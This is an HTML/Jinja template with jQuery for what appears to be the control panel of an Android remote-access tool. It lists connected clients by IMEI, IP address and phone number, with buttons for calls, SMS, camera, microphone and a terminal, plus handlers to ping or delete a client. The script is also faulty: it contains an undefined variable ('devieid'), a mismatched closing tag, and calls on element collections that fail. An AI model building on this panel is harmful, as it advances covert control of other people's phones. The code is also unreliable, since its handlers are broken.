<tr class="client-{{ data[1] }}">
    <td class="model-{{ data[1] }}">{{ data[0] }}</td>
    <td class="device-id-{{ data[1] }}">{{ data[1] }}</td>
    <td class="ip-address-{{ data[1] }}">{{ data[2] }}</td>
    <td class="api-{{ data[1] }}">{{ data[3] }}</td>
    <td class="imei-{{ data[1] }}">{{ data[4] }}</td>
    <td class="socket-id-{{ data[1] }}">{{ data[5] }}</td>
    <td class="phone-{{ data[1] }}">{{ data[6] }}</td>
    <td class="text-end">
        <button class="btn btn-outline-success btn-rounded btn-phone-{{ data[1] }}"><i class="fas fa-phone"></i></button>
        <button class="btn btn-outline-primary btn-rounded btn-sms-{{ data[1] }}"><i class="fas fa-sms"></i></button>
        <button class="btn btn-outline-secondary btn-rounded btn-camera-{{ data[1] }}"><i class="fas fa-camera"></i></button>
        <button class="btn btn-outline-info btn-rounded btn-microphone-{{ data[1] }}"><i class="fas fa-microphone"></i></button>
        <button class="btn btn-outline-dark btn-rounded btn-terminal-{{ data[1] }}"><i class="fas fa-terminal"></i></button>
        <span class="dropdown">
            <button class="btn btn-outline-secondary btn-rounded dropdown-toggle" type="button" id="dropdownMenuButton-{{ data[1] }}" data-bs-toggle="dropdown" aria-expanded="false"></button>
            <ul class="dropdown-menu" aria-labelledby="dropdownMenuButton-{{ data[1] }}">
              <li><a class="dropdown-item" id="test-connection-{{ data[1] }}"><i class="fas fa-wifi" style="color: yellowgreen;"></i> Test Connection</a></li>
              <li><a class="dropdown-item" id="remove-{{ data[1] }}"><i class="fas fa-trash" style="color: red;"></i> Remove Client</a></li>
            </ul>
        </div>
    </td>
</tr>

<script>
    $(document).ready(function (){
        $("a").click(function(){
            console.log(this.id)
            if(this.id.startsWith("test-connection")){
                var id = this.id.replace("test-connection-", "")
                var socketid = document.getElementsByClassName(`socket-id-${id}`)
                var deviceid = document.getElementsByClassName(`device-id-${id}`)
                $.ajax({
                    url: '/log',
                    type: 'post',
                    data: {
                    'data' : `Emitting ping event to ${id} ...`,
                    'highlight' : 'light'
                    },
                    success: function(data){
                        $('.log-class').append(data.htmlresponse)
                        $.ajax({
                            url: '/pingclient',
                            type: 'post',
                            data: {
                            'socketid' : socketid,
                            'deviceid' : devieid
                            },
                            success: function(data){
                                $.ajax({
                                    url: '/log',
                                    type: 'post',
                                    data: {
                                    'data' : 'Device pinged. Waiting for response ...',
                                    'highlight' : 'light'
                                    },
                                    success: function(data){
                                        $('.log-class').append(data.htmlresponse);
                                        // perform check to see if device does not respond. possibly a 15 seconds timer to execute
                                    }
                                });
                            }
                        });
                    }
                });
            }

            if(this.id.startsWith("remove")){
                var id = this.id.replace("remove-", "")
                $.ajax({
                    url: '/log',
                    type: 'post',
                    data: {
                    'data' : `Deleting ${id} from database ...`,
                    'highlight' : 'light'
                    },
                    success: function(data){
                        $('.log-class').append(data.htmlresponse);
                        $.ajax({
                            url: '/deleteclient',
                            type: 'post',
                            data: {
                                'deviceid' : id
                            },
                            success: function(data){
                                console.log(data)
                                // check response/status code to be sure record was deleted
                                var client = document.getElementsByClassName(`client-${id}`)
                                client.remove()
                                $.ajax({
                                    url: '/log',
                                    type: 'post',
                                    data: {
                                    'data' : `Successfully deleted ${id} from database`,
                                    'highlight' : 'success'
                                    },
                                    success: function(data){
                                        $('.log-class').append(data.htmlresponse);
                                    }
                                });
                            }
                        });
                    }
                });
            }
        })
    })
</script>